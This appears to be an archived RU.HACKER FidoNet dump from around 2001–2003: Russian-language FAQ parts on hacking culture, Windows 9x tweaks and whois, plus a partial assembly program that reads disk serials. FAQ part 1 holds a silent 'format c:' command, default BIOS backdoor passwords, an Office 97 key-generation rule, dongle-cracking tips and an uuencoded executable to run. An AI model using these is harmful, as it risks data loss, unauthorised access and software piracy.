JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5947 [1-10330] K/s From : Moderator's Post 03-Jul-03 00:18:21 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5948 [1-10330] K/s From : Moderator's Post 03-Jul-03 00:18:22 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5949 [1-10330] K/s From : Moderator's Post 03-Jul-03 00:18:24 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5950 [1-10330] From : Max Ivanov 10-Jun-03 19:58:17 2:5030/110.50 To : Denis Rogovchenko 2:463/678.3 Subj : HDD SERIAL =====================================================================RU.HACKER= [USSR, St.Leningrad, 10 Июн 03] ■ 23 Май 03, [Denis Rogovchenko]  [All]: DR> Как под виндой узнать апаратный серийник винта? DR> GetVolomeInformation(...) возвращает номер тома.......а мне надо DR> винта... .486 .model flat,stdcall LOCALS extrn ExitProcess:PROC EXTRN GetStdHandle: PROC EXTRN lstrlen: PROC EXTRN CreateFileA: PROC EXTRN WriteFile: PROC EXTRN ReadFile: PROC EXTRN CloseHandle: PROC EXTRN DeviceIoControl:PROC EXTRN GetVersionExA:PROC EXTRN GetWindowsDirectoryA:PROC EXTRN GetVolumeInformationA:PROC CRLF EQU 0Dh, 0Ah EOL EQU 00h STD_OUTPUT_HANDLE EQU -11 ; FILE_ATTRIBUTE_NORMAL EQU 00000080h OPEN_EXISTING EQU 00000003h CREATE_ALWAYS EQU 00000002h OPEN_ALWAYS EQU 00000004h ; GENERIC_WRITE EQU 40000000h GENERIC_READ EQU 80000000h ; _OSVERSIONINFOA struc dwOSVersionInfoSize dd ? dwMajorVersion dd ? dwMinorVersion dd ? dwBuildNumber dd ? dwPlatformId dd ? szCSDVersion db 128 dup(?) _OSVERSIONINFOA ends ; VER_PLATFORM_WIN32_NT equ 2 ; UDATASEG dwAction DD ? hConsole_w DD ? hFile DD ? lpBytesWritten DD ? lpBytesRead DD ? lpBuffer DB ? ; DATASEG szCopyright db 'Cronos dumper. (x)2002 by MeteO', 13,10,0 szCrosys9x db '\\.\CROSYS9X.VXD',0 sz_PhysicaldriveD db '\\.\PhysicalDrive' driveD db '0' db 0 t_PhysicaldriveD equ $-sz_PhysicaldriveD lpFileName db 'Cronos.dmp', 0 VersionInformation _OSVERSIONINFOA ? szDigits db '0123456789ABCDEF' msgErrorOpen db '[!] Error opening file ', 0 msgErrorOpenVXD db '[!] Error opening VxD ', 0 msgErrorGetInfo db '[!] Error getting HDD info ', 0 msgDone db '[#] Done ' CrLf db 0dh,0ah,0 Buffer db 200h dup (?) t_Buffer equ $-Buffer HDDInfo db 100h*4 dup (?) t_HDDInfo equ $-HDDInfo CODESEG Main proc call GetStdHandle, STD_OUTPUT_HANDLE mov [hConsole_w], eax call PrintText, offset szCopyright call GetVolumeInfo mov [VersionInformation.dwOSVersionInfoSize], 94h push offset VersionInformation call GetVersionExA cmp [VersionInformation.dwPlatformId], VER_PLATFORM_WIN32_NT jz @@NT @@W95: call GetHDDInfoW95 mov edx, offset msgErrorGetInfo or eax, eax jz @@Error jmp @@done @@NT: mov ecx, offset Buffer call GetHDDInfoNT mov edx, offset msgErrorGetInfo or eax, eax jz @@Error @@done: call CreateFileA, offset lpFileName, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, mov [hFile], eax cmp eax, 0FFFFFFFFh mov edx, offset msgErrorOpen jz @@Error call WriteFile, [hFile], offset HDDInfo, t_HDDInfo, offset lpBytesWritten, call CloseHandle, [hFile] @@quit: call PrintText, offset msgDone call CloseHandle, [hConsole_w] call ExitProcess, 0 @@Error: call PrintText, edx jmp @@quit Main endp ; GetVolumeInfo proc LOCAL VolumeSerialNumber,FileSystemFlags:DWORD USES esi,ecx,edi lea esi, Buffer push 104h ; uSize push esi ; lpBuffer call GetWindowsDirectoryA push esi call PrintText push 0 ; nFileSystemNameSize lea eax, [FileSystemFlags] push 0 ; lpFileSystemNameBuffer push eax ; lpFileSystemFlags lea ecx, [VolumeSerialNumber] push 0 ; lpMaximumComponentLength push ecx ; lpVolumeSerialNumber push 0 ; nVolumeNameSize push 0 ; lpVolumeNameBuffer push esi ; lpRootPathName mov byte ptr [esi+3], 0 call GetVolumeInformationA test eax, eax jnz short @@fail mov [VolumeSerialNumber], 0FFFFFFFFh @@fail: mov eax, [VolumeSerialNumber] mov edi, offset Buffer push edi mov byte ptr [edi],':' inc edi call OutDword call PrintText ; LP to buffer at stack push offset CrLf call PrintText ret GetVolumeInfo endp ; GetHDDInfoW95 proc call CreateFileA, offset szCrosys9x, 0, 0, 0, OPEN_EXISTING, 0, mov edx, offset msgErrorOpenVXD cmp eax, 0FFFFFFFFh je @@Error mov esi, eax lea eax, lpBytesRead push 0 ; lpOverlapped push eax ; lpBytesReturned lea ecx, Buffer push t_Buffer ; nOutBufferSize push ecx ; lpOutBuffer push 0 ; nInBufferSize push 0 ; lpInBuffer push 1 ; dwIoControlCode push esi ; hDevice call DeviceIoControl push esi ; hObject call CloseHandle cld ; Do remap lea esi, Buffer+0c0h lea edi, HDDInfo mov ecx, 100h rep movsb @@Exit: mov eax, 1 ret @@Error: xor eax, eax ret GetHDDInfoW95 endp ; GetHDDInfoNT proc near xRes = dword ptr -548h BytesReturned = dword ptr -544h var_540 = dword ptr -540h OutBuffer = byte ptr -53Ch var_524 = byte ptr -524h FileName = byte ptr -500h bHDDInfo = byte ptr -400h arg_C = byte ptr 10h sub esp, 548h push ebx push ebp xor ebx, ebx push esi push edi mov ebp, ecx mov [esp+558h+xRes], ebx @@loop: mov driveD, bl add driveD, '0' cld lea edi, [esp+558h+FileName] lea esi, sz_PhysicaldriveD ; "\\\\.\\PhysicalDrive%d" mov ecx, t_PhysicaldriveD rep movsb lea ecx, [esp+558h+FileName] push 0 ; hTemplateFile push 0 ; dwFlagsAndAttributes push 3 ; dwCreationDisposition push 0 ; lpSecurityAttributes push 3 ; dwShareMode push 0C0000000h ; dwDesiredAccess push ecx ; lpFileName call CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jz @@next mov ecx, 6 xor eax, eax lea edi, [esp+558h+OutBuffer] lea edx, [esp+558h+BytesReturned] repe stosd push eax ; lpOverlapped push edx ; lpBytesReturned lea eax, [esp+560h+OutBuffer] push 24 ; nOutBufferSize push 